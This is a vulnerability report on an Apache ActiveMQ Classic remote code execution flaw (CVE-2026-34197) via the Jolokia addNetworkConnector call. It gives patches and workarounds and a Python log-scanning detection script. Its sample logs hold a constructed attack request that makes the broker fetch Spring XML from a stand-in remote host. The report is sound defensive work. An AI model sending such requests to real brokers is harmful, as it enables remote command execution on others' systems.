Full Report
Security researchers discovered a remote code execution (RCE) vulnerability in Apache ActiveMQ Classic that has gone undetected for 13 years and could be exploited to execute arbitrary commands. [...]
Analysis Summary
# Vulnerability: Apache ActiveMQ Classic Remote Code Execution via Jolokia API
## CVE Details
- **CVE ID:** CVE-2026-34197
- **CVSS Score:** 8.8 (High)
- **CWE:** Not specifically named, but relates to Insecure Deserialization/Remote Config Loading (similar to CWE-94 or CWE-502).
## Affected Systems
- **Products:** Apache ActiveMQ Classic
- **Versions:**
  - Versions prior to 5.19.4
  - Versions 6.0.0 through 6.2.2
- **Configurations:**
  - Systems where the Jolokia management API is accessible.
- **Critical Risk:** Versions 6.0.0 through 6.1.1 are especially vulnerable as they are impacted by CVE-2024-32114, which allows unauthenticated access to the Jolokia API.
## Vulnerability Description
The flaw resides in the interaction between the Jolokia management API and the ActiveMQ broker functions. Specifically, the API exposes a function called `addNetworkConnector`. An attacker can abuse this function by sending a specially crafted request that forces the broker to load an external configuration. By pointing the broker to a remote Spring XML file, the attacker can trigger the execution of arbitrary system commands during the initialization of the new network connector. The vulnerability was notably discovered using AI-assisted analysis (Claude), which identified the dangerous interaction between Jolokia, JMX, and VM transports.
## Exploitation
- **Status:** PoC available (detailed by Horizon3 researchers); not yet reported as exploited in the wild.
- **Complexity:** Medium (requires crafting a specific Jolokia request and hosting a malicious XML).
- **Attack Vector:** Network
## Impact
- **Confidentiality:** High (Full system access possible)
- **Integrity:** High (Ability to execute arbitrary commands)
- **Availability:** High (Potential for system takeover or service disruption)
## Remediation
### Patches
Users should upgrade to one of the following versions, which address the vulnerability as of March 30, 2026:
- **ActiveMQ Classic 5.19.4**
- **ActiveMQ Classic 6.2.3**
### Workarounds
- Restrict access to the Jolokia management API endpoint.
- Implement strict firewall rules to prevent the broker from making outbound HTTP/HTTPS connections to unknown or untrusted servers (to prevent fetching the malicious Spring XML).
- Ensure that CVE-2024-32114 is patched to prevent unauthenticated access to management interfaces.
## Detection
### Indicators of Compromise
- **Log Patterns:** Look for suspicious broker connections in the ActiveMQ logs.
- **Protocol/Parameters:** Search for the internal transport protocol `VM` used in conjunction with the query parameter `brokerConfig=xbean:http://`.
- **Warning Messages:** A warning message regarding a "configuration problem" during connection attempts may indicate that a payload has already been executed.
### Detection Methods and Tools
- Monitor outbound network traffic from ActiveMQ servers for requests to external IPs/domains fetching XML files.
- Use SIEM rules to flag `addNetworkConnector` calls within Jolokia API logs.
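The three indicators above (a `VM` transport URI carrying `brokerConfig=xbean:http://`, an `addNetworkConnector` call in Jolokia request logs, and a "configuration problem" warning) can be turned into a small triage script. The following is an added example and not code from the Apache advisory or from Horizon3's disclosure; the log lines it scans are constructed to resemble ActiveMQ broker and Jolokia request logs, and the rule names, the `203.0.113.10` address and the function names are assumptions made for illustration.

```python
import re
from dataclasses import dataclass
from typing import Iterable, List
from urllib.parse import urlparse

# Indicator 1: a VM transport URI whose brokerConfig points at a remote xbean (Spring XML) file.
VM_REMOTE_XBEAN = re.compile(r'vm://[^\s"]*?brokerConfig=xbean:https?://[^\s"&)]+', re.IGNORECASE)
# Indicator 2: a Jolokia request (GET path or POST JSON form) that invokes addNetworkConnector.
JOLOKIA_REQUEST = re.compile(r'(/api/jolokia|"type"\s*:\s*"exec")', re.IGNORECASE)
ADD_NETWORK_CONNECTOR = re.compile(r"addNetworkConnector", re.IGNORECASE)
# Indicator 3: the "configuration problem" warning named above as a possible sign of prior execution.
CONFIG_PROBLEM = re.compile(r"configuration problem", re.IGNORECASE)


@dataclass
class Finding:
    line_no: int    # 1-based index into the scanned input
    rule: str       # which indicator fired (rule names are assumptions of this example)
    severity: str
    evidence: str   # the matched fragment, or the whole line


def scan_log_lines(lines: Iterable[str]) -> List[Finding]:
    """Apply the three indicator rules to every line; one line may yield several findings."""
    findings: List[Finding] = []
    for n, line in enumerate(lines, start=1):
        m = VM_REMOTE_XBEAN.search(line)
        if m:
            findings.append(Finding(n, "vm-transport-remote-xbean", "high", m.group(0)))
        if JOLOKIA_REQUEST.search(line) and ADD_NETWORK_CONNECTOR.search(line):
            findings.append(Finding(n, "jolokia-addNetworkConnector", "high", line.strip()))
        if CONFIG_PROBLEM.search(line):
            findings.append(Finding(n, "config-problem-warning", "medium", line.strip()))
    return findings


def remote_config_hosts(findings: Iterable[Finding]) -> List[str]:
    """Hosts the broker was told to fetch its configuration from.

    Compare these against the egress allowlist from the Workarounds section and
    against outbound proxy/firewall logs for XML fetches.
    """
    hosts = set()
    for f in findings:
        if f.rule != "vm-transport-remote-xbean":
            continue
        url = f.evidence.split("brokerConfig=xbean:", 1)[1]
        host = urlparse(url).hostname
        if host:
            hosts.add(host)
    return sorted(hosts)


# Constructed sample lines (not real ActiveMQ output); 203.0.113.0/24 is a documentation range.
SAMPLE_LOG = [
    '2026-03-31 10:02:11,004 | INFO  | Jolokia: POST /api/jolokia '
    '{"type":"exec","mbean":"org.apache.activemq:type=Broker,brokerName=localhost",'
    '"operation":"addNetworkConnector",'
    '"arguments":["static:(vm://remote?brokerConfig=xbean:http://203.0.113.10:8000/bad.xml)"]}',
    '2026-03-31 10:02:11,120 | INFO  | Establishing network connection from '
    'vm://localhost?async=false&network=true to '
    'static:(vm://remote?brokerConfig=xbean:http://203.0.113.10:8000/bad.xml)',
    '2026-03-31 10:02:12,450 | WARN  | Could not start network bridge: configuration problem',
    '2026-03-31 10:05:00,000 | INFO  | Establishing network connection from '
    'vm://localhost?async=false&network=true to tcp://broker2:61616',
]

if __name__ == "__main__":
    hits = scan_log_lines(SAMPLE_LOG)
    for h in hits:
        print(f"line {h.line_no:>3} [{h.severity:<6}] {h.rule}: {h.evidence[:80]}")
    print("remote config hosts:", remote_config_hosts(hits))
```

The last sample line is a normal network connector to another broker over TCP and produces no finding, which is the distinction a SIEM rule needs: `addNetworkConnector` and VM transports are legitimate on their own, and it is the combination with a remote `xbean:http(s)://` configuration source that is the indicator. Feed real broker and Jolokia access logs through `scan_log_lines` and treat any host returned by `remote_config_hosts` as a candidate for the outbound-traffic check described above.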
## References
- Apache Security Advisory: hxxp[://]activemq[.]apache[.]org/security-advisories.data/CVE-2026-34197-announcement[.]txt
- Horizon3 Research Disclosure: hxxps[://]horizon3[.]ai/attack-research/disclosures/cve-2026-34197-activemq-rce-jolokia/
- NVD Detail: hxxp[://]nvd[.]nist[.]gov/vuln/detail/CVE-2026-34197